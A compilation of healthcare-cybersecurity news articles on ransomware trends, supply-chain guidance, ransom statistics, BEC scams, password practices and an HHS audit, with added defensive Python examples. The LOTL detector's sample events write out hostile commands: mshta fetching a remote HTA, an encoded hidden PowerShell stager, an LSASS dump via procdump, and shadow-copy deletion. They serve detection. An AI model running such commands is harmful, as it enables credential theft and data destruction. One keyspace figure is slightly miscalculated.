Healthcare Cybersecurity

HC3 Highlights Trends in Ransomware Attacks on the HPH Sector

The tactics, techniques, and procedures (TTPs) used by ransomware and other cyber threat actors are constantly evolving to evade detection and allow the groups to conduct more successful attacks. The TTPs employed in the first quarter of 2022 by ransomware gangs have been analyzed and shared by the Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3).

In Q1, 2022, the majority of ransomware attacks on the Healthcare and Public Health Sector (HPH) were conducted by five ransomware-as-a-service groups. LockBit 2.0 and Conti each accounted for 31% of attacks, followed by SunCrypt (16%), ALPHV/BlackCat (11%), and Hive (11%). The financially motivated threat groups FIN7 and FIN12 have also shifted their activities and have moved to ransomware operations, with FIN7 working with ALPHV and FIN12 extensively involved in attacks on the HPH sector. FIN12’s involvement has decreased the timescale for conducting attacks from 5 days to 2 days.

Ransomware gangs often work with initial access brokers (IABs), which specialize in gaining access to organizations’ networks and then sell that access to the ransomware gangs. Outsourcing initial access lets the gangs concentrate on developing their ransomware variants, running their RaaS operations, and refining their TTPs. HC3 observed no change in the number of IABs working with ransomware gangs in Q1, 2022, with numbers similar to those seen throughout 2021.

IABs were most commonly observed advertising general VPN/RDP access to the networks of HPH entities on cybercrime forums, which accounted for more than half of forum adverts, and around 25% of advertisements were offering compromised Citrix/VPN appliances. Remote access solutions were extensively implemented by organizations to support a remote workforce during the COVID-19 pandemic, but the rush to deploy meant basic security features were not implemented, and vulnerabilities have been extensively exploited.

Ransomware gangs are increasingly using living-off-the-land (LOTL) techniques in their attacks, abusing legitimate tools that are already present in most enterprise environments, such as CMD.exe, PowerShell, Task Scheduler, MSHTA, and the Sysinternals suite. Because these tools are signed, trusted, and routinely used by administrators, their malicious use is harder to distinguish from normal activity.

Tactics include the use of remote access tools such as AnyDesk, Atera, ScreenConnect, and ManageEngine; rebooting into Windows Safe Mode to sidestep security software; encryption tools such as BitLocker and DiskCryptor; file transfer tools such as FileZilla FTP; Microsoft Sysinternals tools such as PsExec and Procdump; and offensive and open-source tools such as Cobalt Strike, Mimikatz, Dumpert (an LSASS memory dumper), AdFind, Process Hacker, and MegaSync.

While malicious use of these tools is difficult for security teams to detect, there are detection opportunities. HC3 recommends a behavior-based approach: forwarding endpoint and authentication telemetry to a Security Information and Event Management (SIEM) tool and alerting on suspicious combinations of process, parent process, and command line (for example, an Office application spawning MSHTA, or PowerShell launched with an encoded command). Signature-based tools cannot catch this activity because the binaries themselves are legitimate.
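The following is an added example of the behavior-based detection described above; it is not code from the HC3 report or from any SIEM vendor. It parses constructed Sysmon-style process-creation events (a few key=value fields per line, fabricated for the demo) and applies command-line and parent/child rules for the LOTL tools named on this page. The rule names, the sample hosts, and the sample command lines are all assumptions made for illustration; the ATT&CK IDs are those of the techniques each rule targets.

```python
"""Behavior-based detection of living-off-the-land (LOTL) tool abuse.

Added example: this is not code from the HC3 report. It parses constructed
Sysmon-style process-creation events (a few key=value fields per line)
and applies the kind of command-line and parent/child rules a SIEM
correlation search would run. Sample events below are fabricated.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    rule: str
    technique: str   # ATT&CK technique ID for the behaviour the rule targets
    host: str
    image: str
    command_line: str


_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line):
    """Turn 'Key=value Key="quoted value"' into a dict with the fields we use."""
    ev = {k: (q if q else u) for k, q, u in _KV.findall(line)}
    for key in ("Host", "Image", "ParentImage", "CommandLine"):
        ev.setdefault(key, "")
    return ev


def _base(path):
    return path.lower().rsplit("\\", 1)[-1]


def _img(ev, *names):
    return _base(ev["Image"]) in names


def _cmd(ev, pattern):
    return re.search(pattern, ev["CommandLine"], re.I) is not None


# (rule name, ATT&CK ID, predicate). Rules key on behaviour, not file hashes,
# because every binary here is a legitimate, signed tool.
RULES = [
    ("mshta_remote_or_inline_script", "T1218.005",
     lambda ev: _img(ev, "mshta.exe") and _cmd(ev, r"https?://|javascript:|vbscript:")),
    ("powershell_encoded_command", "T1059.001",
     lambda ev: _img(ev, "powershell.exe", "pwsh.exe")
     and _cmd(ev, r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b")),
    ("psexec_service_execution", "T1569.002",
     lambda ev: _img(ev, "psexec.exe", "psexec64.exe", "psexesvc.exe")),
    ("lsass_dump_procdump", "T1003.001",
     lambda ev: _img(ev, "procdump.exe", "procdump64.exe") and _cmd(ev, r"lsass")),
    ("lsass_dump_comsvcs", "T1003.001",
     lambda ev: _img(ev, "rundll32.exe") and _cmd(ev, r"comsvcs\.dll.*minidump")),
    ("adfind_domain_recon", "T1087.002",
     lambda ev: _img(ev, "adfind.exe")),
    ("shadow_copy_deletion", "T1490",
     lambda ev: _img(ev, "vssadmin.exe", "cmd.exe") and _cmd(ev, r"vssadmin.*delete\s+shadows")),
    ("schtasks_from_user_writable_path", "T1053.005",
     lambda ev: _img(ev, "schtasks.exe") and _cmd(ev, r"/create")
     and _cmd(ev, r"\\(?:temp|appdata|public|programdata)\\")),
    ("office_spawning_script_host", "T1566.001",
     lambda ev: _img(ev, "cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe")
     and _base(ev["ParentImage"]) in ("winword.exe", "excel.exe", "outlook.exe")),
]


def detect(lines):
    """Run every rule over every event; return the alerts in input order."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        for name, tid, pred in RULES:
            if pred(ev):
                alerts.append(Alert(name, tid, ev["Host"], ev["Image"], ev["CommandLine"]))
    return alerts


def techniques_by_host(alerts):
    """Group fired technique IDs per host, which is what an analyst triages."""
    out = {}
    for a in alerts:
        out.setdefault(a.host, []).append(a.technique)
    return out


# Constructed sample telemetry: a macro-delivered HTA, an encoded PowerShell
# stager, an LSASS dump, PsExec's service on a DC, shadow-copy deletion, and
# two benign admin commands that must not fire.
SAMPLE_EVENTS = [
    r'Host=WS01 Image="C:\Windows\System32\mshta.exe" ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" CommandLine="mshta.exe http://203.0.113.10/inv.hta"',
    r'Host=WS01 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\System32\mshta.exe" CommandLine="powershell.exe -nop -w hidden -enc SQBFAFgA"',
    r'Host=WS01 Image="C:\Users\Public\procdump64.exe" ParentImage="C:\Windows\System32\cmd.exe" CommandLine="procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\l.dmp"',
    r'Host=DC01 Image="C:\Windows\PSEXESVC.exe" ParentImage="C:\Windows\System32\services.exe" CommandLine="C:\Windows\PSEXESVC.exe"',
    r'Host=WS01 Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="cmd.exe /c vssadmin delete shadows /all /quiet"',
    r'Host=WS02 Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="powershell.exe Get-ChildItem C:\Logs"',
    r'Host=WS02 Image="C:\Windows\System32\cmd.exe" ParentImage="C:\Windows\explorer.exe" CommandLine="cmd.exe /c dir"',
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a.host:5} {a.technique:10} {a.rule:32} {a.command_line}")
```

Run against the constructed events, the first five lines each trip at least one rule (the HTA launched from Word trips two: the remote-script rule and the Office-parent rule), while the two benign PowerShell and cmd.exe lines produce nothing. That last point is the design goal: the rules never match on the tool name alone, because the tool is legitimate; they match on what it was asked to do and who launched it.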

The HC3 Ransomware Trends in the HPH Sector Report provides detailed information on the TTPs employed by each ransomware operation, including the most commonly abused LOTL tools, relevant ATT&CK techniques, and a long list of mitigations that can be implemented to prevent, detect, respond to, and recover from ransomware attacks.

The post HC3 Highlights Trends in Ransomware Attacks on the HPH Sector appeared first on HIPAA Journal.

NIST Published Updated Cybersecurity Supply Chain Risk Management Guidance

On Thursday, May 5, 2022, the National Institute of Standards and Technology (NIST) published updated cybersecurity supply chain risk management (C-SCRM) guidance to help organizations develop an effective program for identifying, assessing, and responding to cybersecurity risks throughout the supply chain.

Cyber threat actors are increasingly targeting the supply chain. A successful attack on a single supplier can allow the threat actor to compromise the networks of all companies that use the product or service, as was the case with the REvil ransomware attack on Kaseya in 2021. The threat actors exploited a vulnerability in Kaseya VSA software and the attack affected up to 1,500 businesses.

The publication, Cybersecurity Supply Chain Risk Management Practices for Systems and Organizations (NIST Special Publication 800-161 Revision 1), is the result of a multiyear process that included the release of two draft versions of the guidance. The updated guidance can be used to identify, assess, and respond to cybersecurity risks throughout the supply chain at all levels of an organization.

While organizations should consider vulnerabilities in the finished product they are evaluating, the guidance also encourages them to consider the security of the product’s components, which may include open source code or components developed by third parties. A product or device may have been designed in one country, manufactured in another, and incorporate components from many other countries, which in turn may have been assembled from parts provided by disparate manufacturers. Malicious code may have been incorporated into components, and vulnerabilities may have been introduced that could be exploited by cyber threat actors. The guidance encourages organizations to consider the journey that each of the components took to reach their destination.

The guidance is aimed at acquirers and end users of products, software, and services. Since the guidance is intended to be used by a wide audience, user profiles are included that explain which sections of the guidance are most relevant for each group. “The publication integrates cybersecurity supply chain risk management (C-SCRM) into risk management activities by applying a multilevel, C-SCRM-specific approach, including guidance on the development of C-SCRM strategy implementation plans, C-SCRM policies, C-SCRM plans, and risk assessments for products and services,” explained NIST.

The guidance can be used to build cybersecurity supply chain risk considerations and requirements into acquisition processes and create a program for continuously monitoring and managing supply chain risks.

“Managing the cybersecurity of the supply chain is a need that is here to stay,” said NIST’s Jon Boyens, one of the authors of the publication. “If your agency or organization hasn’t started on it, this is a comprehensive tool that can take you from crawl to walk to run, and it can help you do so immediately.”


Average Ransom Payment Dropped by 34% in Q1, 2022

The average ransom payment in ransomware attacks fell by 34% in Q1, 2022, from an all-time high in Q4, 2021, according to ransomware incident response firm Coveware. The average ransom payment in Q1, 2022 was $211,259 and the median ransom payment was $73,906.

The fall in total ransom payments has been attributed to several factors. Coveware suggests ransomware gangs have been targeting smaller organizations and issuing lower ransom demands, due to the increased scrutiny by law enforcement when attacks are conducted on large enterprises. The median company size has been falling since Q4, 2020, and is now companies with around 160 employees. This appears to be the sweet spot, where the companies have sufficient revenues to allow sizable ransoms to be paid, but not so large that attacks will result in considerable scrutiny by law enforcement.

Another reason why total ransom payments have fallen is fewer victims of ransomware attacks have been paying the ransom. The number of victims of ransomware attacks that pay the ransom has been steadily declining, from 85% of victims in Q1 2019 to 46% of victims in Q1, 2022. Also, some of the most prolific ransomware operations have gone quiet, such as Maze and REvil (Sodinokibi).

Conti and LockBit are the most prolific ransomware operations, accounting for 16.1% and 14.9% of ransomware attacks respectively, followed by BlackCat/Alphv (7.1%), Hive (5.4%), and AvosLocker (4.8%). Coveware suggests that the affiliates who work with ransomware-as-a-service operations appear to be less keen to work with large RaaS groups, as those groups are often targeted by law enforcement. It is now common for affiliates to try smaller RaaS operations or even develop their own ransomware variants from leaked source code.

The most common attack vectors in ransomware attacks are phishing, Remote Desktop Protocol connections, and exploiting unpatched vulnerabilities in software and operating systems. Coveware has tracked an increase in other attack vectors since Q2, 2021, such as social engineering and the direct compromising of insiders. Social engineering attacks are similar to phishing but are highly targeted and often involve priming or grooming targeted employees before convincing them to provide access to the network. There has also been an increase in lone wolf attackers. Coveware identified the trend in late 2021, and it has continued throughout Q1, 2022. Attacks by these threat actors are often conducted on companies that have far better security than the average ransomware victim, such as multi-factor authentication properly enabled for all employees and critical resources.

In late 2019, the Maze ransomware operation started using double extortion tactics, where data is stolen from victims before files are encrypted. Payment must then be made for the decryptor and to prevent the publication or sale of the stolen data. These tactics were rapidly adopted by many ransomware operations and became the norm, although the proportion of attacks combining encryption with data theft declined in Q1, 2022: double extortion was used in 84% of attacks in Q4, 2021, and 77% of attacks in Q1, 2022. While double extortion is likely to continue to be extensively used in attacks for the foreseeable future, Coveware expects the shift from data encryption to data extortion to continue, as data theft and naming and shaming victims are less likely to attract the attention of law enforcement. “Data theft without encryption results in no operational disruption but preserves the ability of the threat actor to extort the victim. We expect this shift from Big Game Hunting to Big Shame Hunting to continue,” explained Coveware in the report.

Coveware warned about paying the ransom to prevent the publication or sale of data, as there are no guarantees that payment will result in data deletion. In 63% of attacks where a ransom was paid to prevent publication or sale of stolen data, the attackers provided no proof of data deletion. In the remaining attacks where proof was provided, it could easily have been faked. When videos, screenshots, live screen shares, or deletion logs are provided as proof, victims must trust that a copy of the data has not been made. “In one notable case, we observed a threat actor explicitly state that they would not be deleting the stolen data if paid, and would keep it for future leverage against the victim,” said Coveware.


FBI Issues Warning About BEC Scams as Losses Increase to $43 Billion

The Federal Bureau of Investigation (FBI) has issued a public service announcement warning about the threat of Business Email Compromise/Email Account Compromise (BEC/EAC) scams. The number of attacks reported to the FBI Internet Crime Complaint Center (IC3) and the amount of money lost to these scams continues to grow each year, with losses to BEC/EAC scams increasing 65% between July 2019 and December 2021.

BEC/EAC scams are the leading cause of losses to cybercrime. Between June 2016 and December 2021, IC3 received 241,206 complaints about domestic and international BEC/EAC attacks with reported losses of more than $43.3 billion. The IC3 2021 Internet Crime Report shows victims reported losses of $2.4 billion in 2021 across 19,954 complaints – around one-third of all losses to cybercrime in 2021. The actual losses to these scams are undoubtedly far higher, as many victims do not report the scams to the FBI, especially if the losses are relatively small.

BEC/EAC scams involve compromising (or convincingly spoofing) the email accounts of trusted parties and using them to send requests for fraudulent fund transfers, or for changes to bank account details for upcoming payments, to businesses and individuals who perform legitimate transfers of funds. Statistical data shows the destination accounts for these transfers are most commonly overseas. The FBI says fraudulent transfers were made to banks in 140 countries, with Thailand topping the list followed by Hong Kong, China, Mexico, and Singapore.

The number of complaints about BEC/EAC scams involving cryptocurrency has been growing. IC3 first received such complaints in 2018, when reported losses were less than $5 million; in 2021, cryptocurrency losses from BEC/EAC scams of $40 million were reported.

While it is common for scammers to target large enterprises that routinely perform transfers of millions of dollars, businesses of all sizes have been targeted including small local firms as well as individuals. The FBI says scams have been reported domestically in all 50 states, and reports have been received from victims in 177 countries.

BEC/EAC scams are conducted frequently because they have a high success rate and the ROI is so high. Fraudulent transfers are often for hundreds of thousands or millions of dollars, and the high success rate is due to the abuse of trust. The emails requesting transfers come from the email accounts of trusted individuals, such as company executives, vendors, and business partners, and the requests for transfers or bank account changes are often not questioned. The scams can also target sensitive data, such as the personally identifiable information of employees in W-2 forms.

Businesses and individuals should take steps to protect against BEC/EAC scams. These scams often start with phishing emails to obtain credentials to email accounts, so implementing a spam filtering solution to block the initial phishing emails will help to prevent email accounts from being compromised. 2-factor authentication should also be implemented to prevent stolen credentials from being used to access email accounts. Password policies should be implemented and enforced to prevent weak passwords from being set, which are vulnerable to brute force attacks.

Businesses should conduct security awareness training to teach employees how to recognize phishing emails and BEC/EAC scams and condition them to be wary of any email that requests login credentials or PII of any kind. The emails may appear to have been sent by trusted individuals and the reason for providing information often appears legitimate.

It is important to verify that the sender’s display name matches the actual email address, and to check any URLs in emails carefully to confirm they belong to the business or individual they claim to be from. Employees should be alert to hyperlinks and sender domains that contain subtle misspellings of the real domain name. Employees’ computers and corporate-issued mobile devices should be configured to display the full sender email address rather than just the display name, since many mobile mail clients show only the latter.
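As an added example of the checks described above (not code from the FBI announcement or HIPAA Journal), the block below takes the From and Reply-To headers and the links in a message and flags the signs of a BEC attempt: a display name that does not match the sending address, a Reply-To that redirects replies to another domain, and sender or link domains that are one edit or one common character swap away from a trusted domain. The trusted domains, the sample messages, and the finding names are all constructed for the demo; the domain-parsing shortcut (last two labels) is an assumption that a production version would replace with a public-suffix list.

```python
"""Sender and link checks for BEC/EAC triage.

Added example; it is not from the FBI announcement. Given the From and
Reply-To headers and the links in a message, it flags the signs the text
above describes: a display name that does not match the sending address,
a Reply-To that redirects the conversation elsewhere, and sender or link
domains that are one edit or one common character swap away from a
trusted domain. The trusted domains and sample messages are constructed.
"""
import re
from email.utils import parseaddr
from urllib.parse import urlparse

# Character swaps commonly used in lookalike domains; undone before comparing.
_SWAPS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def _skeleton(domain):
    d = domain.lower()
    for bad, good in _SWAPS:
        d = d.replace(bad, good)
    return d


def _levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def _registrable(domain):
    # Last two labels only; good enough for the demo (no public-suffix list).
    return ".".join(domain.lower().strip(".").split(".")[-2:])


def _domain_of(header):
    _, addr = parseaddr(header or "")
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def lookalike_of(domain, trusted):
    """Return the trusted domain this one imitates, or None if trusted or unrelated."""
    reg = _registrable(domain)
    if not reg or reg in trusted:
        return None
    for t in trusted:
        if _skeleton(reg) == _skeleton(t) or _levenshtein(reg, t) == 1:
            return t
    return None


def assess_message(from_header, reply_to, links, trusted):
    """Return (finding, observed, expected) tuples; an empty list means nothing suspicious."""
    findings = []
    name, addr = parseaddr(from_header)
    sender = _domain_of(from_header)
    # 1. Display name carries an address, and it is on a different domain.
    m = re.search(r"[\w.+-]+@([\w.-]+)", name)
    if m and _registrable(m.group(1)) != _registrable(sender):
        findings.append(("display_name_address_mismatch", name, addr))
    # 2. Display name drops a trusted organisation's name, but the sender is not on its domain.
    elif any(t.split(".")[0] in name.lower() for t in trusted) and _registrable(sender) not in trusted:
        findings.append(("display_name_impersonation", name, addr))
    # 3. Sending domain itself is a lookalike.
    target = lookalike_of(sender, trusted)
    if target:
        findings.append(("lookalike_sender_domain", sender, target))
    # 4. Reply-To moves the conversation to another domain.
    rt = _domain_of(reply_to)
    if rt and _registrable(rt) != _registrable(sender):
        findings.append(("reply_to_domain_differs", sender, rt))
    # 5. Links whose host imitates a trusted domain.
    for url in links:
        host = urlparse(url).hostname or ""
        target = lookalike_of(host, trusted)
        if target:
            findings.append(("lookalike_link_domain", host, target))
    return findings


TRUSTED = {"acmehealth.org", "medsupply.com"}   # constructed

# Constructed messages: (From, Reply-To, links)
SAMPLES = {
    "reply_to_hijack": ('Jane Doe <jane.doe@acmehealth.org>',
                        'Jane Doe <jane.doe@acmehea1th.org>', []),
    "vendor_lookalike": ('Accounts Payable - MedSupply <ap@medsupp1y.com>',
                         None, ["http://medsupp1y.com/invoice/4471"]),
    "freemail_exec": ('"ceo@acmehealth.org" <random123@mail.example>', None, []),
    "legitimate": ('Bob Lee <bob@medsupply.com>', None,
                   ["https://portal.medsupply.com/login"]),
}


def run_samples():
    """Finding names per sample message; used by the demo and the checks."""
    return {k: [f[0] for f in assess_message(*v, TRUSTED)] for k, v in SAMPLES.items()}


if __name__ == "__main__":
    for case, found in run_samples().items():
        print(f"{case:17} {found or 'clean'}")
```

The "reply_to_hijack" sample is the case worth studying: the From address is genuine (a real compromised or spoofed employee mailbox), so only the Reply-To gives it away, which is why mail clients that hide the reply address are a problem. Header checks like these reduce the number of messages a person has to scrutinise; they do not replace the out-of-band verification of payment changes that the next paragraph calls for.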

Since these scams often involve compromised internal email accounts and those of vendors, it is important to use secondary channels or two-factor authentication to verify requests for changes to account information and wire transfers, and businesses and individuals should monitor their financial accounts closely for irregularities such as missing deposits.

Victims of BEC/EAC scams should immediately report the incidents to their financial institution and request a recall of funds, and should also file a complaint with IC3. IC3’s Recovery Assist Team initiated the Financial Fraud Kill Chain (FFKC) in 2021 on 1,726 BEC complaints involving domestic to domestic transactions with potential losses of $443,448,237 and achieved a 74% success rate, freezing funds totaling $329 million.


World Password Day 2024 – Password Tips and Best Practices

Thursday, May 2, 2024, is World Password Day. Established in 2013, the event is observed on the first Thursday of May with the goal of improving awareness of the importance of creating complex and unique passwords and adopting password best practices to keep sensitive information private and confidential.

Passwords were first used to protect accounts against unauthorized access in computing environments in the 1960s. In 1961, researchers at the Massachusetts Institute of Technology (MIT) started using the Compatible Time-Sharing System (CTSS). The system ran on an IBM 709 and users could access the system through a dumb terminal, with passwords used to prevent unauthorized access to users’ personal files.

The system is widely believed to be the first to use passwords and was also one of the first to experience a password breach. In the mid-1960s, MIT Ph.D. researcher Allan Scherr needed more than his allotted 4-hour CTSS time to run performance simulations he had designed for the computer system. He discovered a way to print out all passwords stored in the system and used the passwords to gain extra time.

Passwords are now the most common way to secure accounts, and while passwordless authentication such as biometrics is becoming more popular and single sign-on reduces the number of passwords users must manage, in the short to medium term passwords are likely to remain the most widely used way of authenticating users and preventing unauthorized account access.

The Importance of Creating Strong Passwords

The use of passwords carries security risks, which World Password Day aims to address. One of the most common ways for hackers to gain access to accounts is to use stolen passwords. Phishing is used to target employees and trick them into disclosing their passwords, either via email, phone (vishing), or text message (SMiShing). Adopting 2-factor authentication will help to stop these attacks from succeeding. According to Microsoft, 2-factor authentication blocks more than 99% of automated attacks on accounts.

Hackers also use brute force tactics to guess weak passwords and take advantage of default credentials that have not been changed. If accounts are not locked or rate limited after a set number of failed login attempts, weak passwords can be guessed online in a fraction of a second, and if a database of password hashes is stolen, even passwords that use every character class can be recovered offline in seconds or minutes if they are not sufficiently long.

In 2020, Hive Systems started publishing charts showing the time it takes for a hacker to brute force a password using a powerful, commercially available computer, and each year the table is updated to account for advances in computing technology. The chart clearly demonstrates the importance of creating strong passwords that include a combination of numbers, symbols, and upper- and lower-case letters and ensuring passwords contain enough characters. We recommend a minimum password length of 14 characters.

How long does it take to hack a password in 2024. Source: Hive Systems

Password Management Shortcuts Weaken Security

Creating and remembering long, complex passwords is difficult for most people, and it is made even harder due to the need to create passwords to protect multiple accounts – A study by NordPass suggests the average person has around 100 passwords. Many people struggle to create and remember more than one strong and unique password, so with so many accounts to secure it is unsurprising that people take shortcuts, but those password management shortcuts significantly weaken password security.

It is common for users to avoid creating unique passwords and they end up reusing the same password for multiple accounts. The problem with this is that if the password is compromised on one platform, either through brute force tactics, a phishing scam, or another method, all other accounts that use that password are at risk. Hackers take advantage of this common bad practice using a technique called credential stuffing. If they obtain a list of usernames and passwords from a data breach, they will attempt to access accounts on other unrelated platforms using those username and password combinations. This method only succeeds if there has been password reuse.

Changing passwords slightly by adding a number or substituting characters when creating new accounts isn’t much more secure, and will leave accounts susceptible to brute force attacks. If a hacker obtains a username and password combination, various permutations of that password will be attempted with that username. Writing down passwords is also a very bad idea.

Many businesses have implemented minimum complexity requirements for passwords, stipulating a minimum password length and composition requirements, yet it is common for employees to take shortcuts to make passwords easier to remember. It is possible to create a password that meets minimum complexity requirements yet is still incredibly weak. ‘Password’ is still one of the most commonly used passwords and it is usually the first one that is attempted when trying to hack an account. ‘P4ssw0rd!’ would meet the password complexity requirements imposed on many platforms, but it is still incredibly weak and offers next to no protection.
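The block below is an added example illustrating the three points above (the brute-force arithmetic behind the Hive Systems chart, the permutation attacks on a leaked password, and why ‘P4ssw0rd!’ passes a composition rule yet is worthless); it is not code from the article or from Hive Systems. The common-password set is a tiny stand-in for a breach wordlist, the leetspeak mapping is illustrative, and the guess rate is an assumed parameter for offline cracking of a fast hash rather than a measured figure.

```python
"""Password check that catches 'complex' but weak passwords.

Added example, not the article's or Hive Systems' code. A composition
rule passes 'P4ssw0rd!' yet after undoing leetspeak and stripping a
trailing number/symbol it is the word 'password', so it is cracked by a
wordlist with rules, not by exhaustive search. The brute-force estimate
assumes the attacker knows which character classes are used; the guess
rate is an assumed parameter for offline cracking, not a measured figure.
The common-password set is a tiny stand-in for a breach wordlist.
"""
import re
import string

COMMON = {"password", "qwerty", "letmein", "welcome", "admin", "iloveyou",
          "dragon", "monkey", "football", "baseball"}   # stand-in for a breach list

# Substitutions a cracking rule set undoes; the mapping here is illustrative.
LEET = str.maketrans({"4": "a", "@": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "$": "s", "5": "s", "7": "t", "+": "t"})


def normalize(pw):
    """Lower-case, drop leading/trailing digit or symbol runs, undo leetspeak."""
    s = pw.lower()
    s = re.sub(r"[^a-z]+$", "", s)   # 'Password2024!' -> 'password'
    s = re.sub(r"^[^a-z]+", "", s)   # '!!Footb4ll'   -> 'footb4ll'
    return s.translate(LEET)


def charset_size(pw):
    """Alphabet size an attacker would assume from the character classes present."""
    size = 0
    if any(c.islower() for c in pw):
        size += 26
    if any(c.isupper() for c in pw):
        size += 26
    if any(c.isdigit() for c in pw):
        size += 10
    if any(not c.isalnum() for c in pw):
        size += len(string.punctuation) + 1   # punctuation plus space
    return size


def keyspace(pw):
    """Number of candidates an exhaustive search over the assumed alphabet must try."""
    return charset_size(pw) ** len(pw)


def crack_time_seconds(pw, guesses_per_second=1e10):
    """Worst-case exhaustive search; guesses_per_second is an assumed offline rate."""
    return keyspace(pw) / guesses_per_second


def humanize(seconds):
    for unit, span in (("years", 31_557_600), ("days", 86_400),
                       ("hours", 3_600), ("minutes", 60)):
        if seconds >= span:
            return f"{seconds / span:.1f} {unit}"
    return f"{seconds:.3f} seconds"


def assess(pw, min_length=14, guesses_per_second=1e10):
    """Policy verdict plus the numbers behind it. Dictionary hits are weak
    regardless of what the brute-force estimate says."""
    findings = []
    if normalize(pw) in COMMON:
        findings.append("dictionary_word_with_substitutions")
    if len(pw) < min_length:
        findings.append("too_short")
    return {
        "password": pw,
        "length": len(pw),
        "charset": charset_size(pw),
        "brute_force": humanize(crack_time_seconds(pw, guesses_per_second)),
        "findings": findings,
        "verdict": "weak" if findings else "acceptable",
    }


if __name__ == "__main__":
    for candidate in ("P4ssw0rd!", "Password2024!", "Tr0ub4dor&3", "correct horse battery staple"):
        r = assess(candidate)
        print(f"{candidate:30} len={r['length']:2} charset={r['charset']:2} "
              f"brute-force={r['brute_force']:>14} {r['verdict']} {r['findings']}")
```

The instructive output is ‘P4ssw0rd!’: the exhaustive-search estimate (95 characters, 9 positions, about 5.7 × 10^17 candidates) looks respectable at the assumed rate, but the normalize step reduces it to ‘password’, which is among the first guesses any wordlist-plus-rules attack makes. The brute-force figure is only meaningful for a password that is genuinely random, which is why the checker reports a dictionary hit as weak before it looks at length or alphabet.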

Global Password Management Survey Reveals Poor Password Management Practices

The 2024 Global Password Management Survey conducted by password management solution provider Bitwarden ahead of World Password Day confirms that extremely risky password practices are still incredibly common. The survey was conducted on more than 2,400 Internet users in the United States, United Kingdom, Australia, Germany, France, and Japan and asked questions about personal passwords, password habits at work, and the strategies that are adopted for managing passwords.

Despite the risks, 84% of respondents admitted to reusing passwords for multiple accounts, down from 90% in 2022. In 2024, 33% of respondents said they reuse passwords on 1-5 sites, 26% reuse passwords on 6-10 sites, 15% reuse passwords on 11-15 sites, and 11% use the same password to secure more than 15 sites. Password reuse is most common on personal accounts; however, 47% of respondents said they reuse passwords at work very (14%) or somewhat (33%) frequently.

Password manager use is increasing. 32% of respondents said they use a password manager at home, up from 30% last year, but only 30% of respondents said they use a password manager at work. 54% of respondents said they rely on memory to manage passwords at home, which suggests that the passwords they set are easy to remember and therefore not particularly complex. 36% of respondents said they use personal information in their passwords, and 60% said that the personal information they use in their passwords can be found in their social media accounts.

Workplace security habits were rated as generally secure by 53% of respondents, with 37% admitting to somewhat (31%) or very (6%) risky workplace security habits. The risky habits reported were the use of weak or personal information-based passwords (39%), storing work passwords insecurely (35%), not using 2-factor authentication (2FA) or multifactor authentication (MFA) (33%), and sharing passwords insecurely (32%).

Account security can be greatly improved with 2FA/MFA, and while there are strong feelings that the additional authentication makes accessing accounts cumbersome, 2FA/MFA is now being widely adopted. 80% of respondents said they use 2FA for personal accounts, up from 66% in 2023, and only 28% of respondents said they do not use 2FA or MFA at work. Awareness of 2FA and MFA is improving, with only 7% of users saying they are not sure what those terms mean, down from 22% last year. While any form of MFA is better than none, SMS-based MFA is still the most common despite this method being the least secure. 65% of respondents said they used SMS-based MFA at home and 50% said SMS-based MFA was used at work.

2FA/MFA is vital for protecting accounts. In the event of a phishing attack where an employee discloses their password, 2FA/MFA can prevent that password from granting access to the account, thus preventing a costly data breach. However, while any form of 2FA/MFA is better than single-factor authentication, phishing-resistant MFA, such as FIDO2 security keys or passkeys, provides the best protection. Threat actors now use adversary-in-the-middle phishing kits that relay the victim’s login to the real site and capture the resulting session cookie and one-time MFA code, bypassing code-based MFA entirely.

Password Security and Management Tips

World Password Day 2024 is the perfect time to assess password security and take steps to ensure that all accounts are properly secured with strong and unique passwords, and start following password best practices:

  • Ensure a strong, unique password is set for all accounts
  • Use a combination of upper- and lower-case letters, numbers, and symbols in passwords
  • Use easy-to-remember passphrases of at least 14 characters rather than single-word passwords
  • Never reuse passwords on multiple accounts
  • Don’t use information in passwords that can be found in social media profiles (DOB, spouse or pet name, etc.) or is known to others
  • Ensure 2-factor authentication is set up, especially for accounts containing sensitive data
  • Use a secure password generator to generate random strings of characters
  • Avoid using dictionary words and commonly used passwords
  • Use a password manager for creating strong passwords and secure storage, and set a long and complex passphrase for your password vault.


HHS Information Security Program Rated ‘Not Effective’

An audit of the Department of Health and Human Services conducted for the HHS’ Office of Inspector General (OIG) to assess compliance with the Federal Information Security Modernization Act of 2014 (FISMA) in the fiscal year 2021 has seen the agency’s security program rated ‘not effective’, as was the case in fiscal years 2018, 2019, and 2020. The audit was conducted at five of the 12 operating divisions of the HHS, although OIG did not state which five divisions were audited.

HHS Information Security Program Maturity Levels. Source: HHS’ OIG

In order to receive an effective rating, the HHS is required to reach the ‘Managed and Measurable’ maturity level for the Identify, Protect, Detect, Respond, and Recover function areas, as required by DHS guidance and the FY 2021 Inspector General FISMA Reporting Metrics.

OIG said in the report that the HHS has continued to make changes to strengthen the maturity of its enterprise-wide cybersecurity program and is making progress to sustain cybersecurity across all FISMA domains. The HHS security program strengthened the maturity of controls for several individual FISMA metrics, although progress in some areas has not been made due to the lack of full implementation of Information Security Continuous Monitoring (ISCM) efforts across its operating divisions. This is critical as reliable data and metrics are required to make informed risk management decisions.

